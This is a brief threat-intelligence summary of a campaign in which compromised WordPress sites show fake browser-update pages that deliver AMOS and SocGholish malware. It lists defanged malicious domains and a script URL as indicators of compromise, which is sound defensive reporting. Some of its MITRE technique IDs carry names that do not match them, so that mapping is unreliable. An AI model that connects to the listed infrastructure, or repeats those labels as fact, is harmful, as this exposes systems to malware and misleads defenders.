10,000 WordPress Websites Found Delivering MacOS and Microsoft Malware – c/side

10,000 WordPress Websites Found Delivering MacOS and Microsoft Malware – c/side
This week’s discovery revealed over 10,000 compromised WordPress sites displaying deceptive Google browser update pages. The malware, targeting both Apple and Microsoft users, includes AMOS and SocGholish variants. The exploitation occurred through client-side attacks utilizing outdated WordPress plugins, notably the RocketLazyLoadScript. This incident highlights vulnerabilities in the web supply chain and reiterates the importance of timely software updates. Affected: WordPress sites, Apple users, Microsoft users

Keypoints :

  • Over 10,000 WordPress sites are affected by fake Google browser update pages.
  • The malware includes AMOS (Atomic macOS Stealer) and SocGholish, targeting Apple and Microsoft users, respectively.
  • The exploitation utilizes outdated WordPress versions and plugins.
  • Malicious JavaScript injected through vulnerabilities in the RocketLazyLoadScript plugin.
  • First instance of these malware types delivered via a client-side attack.
  • Dynamic loading of malicious scripts creates the deceptive browser update page.
  • 27 malicious domains linked to this campaign were identified.
  • It is critical to update WordPress and its plugins to mitigate such risks.

MITRE Techniques :

  • Web Service (T1071) – JavaScript exploited outdated plugins to inject malicious code.
  • Client-Side Injection (T1176) – The attackers dynamically injected an iframe to display the fake update page.
  • Exploit Public-Facing Application (T1190) – Utilized vulnerability in the RocketLazyLoadScript plugin to exploit outdated WordPress versions.

Indicator of Compromise :

  • [URL] https://deski.fastcloudcdn[.]com/m_c_b28cd5c86f08a2b35c766fc4390924de.js
  • [Domain] blacksaltys[.]com
  • [Domain] objmapper[.]com
  • [Domain] rednosehorse[.]com
  • [Domain] blackshelter[.]org


Full Story: https://cside.dev/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware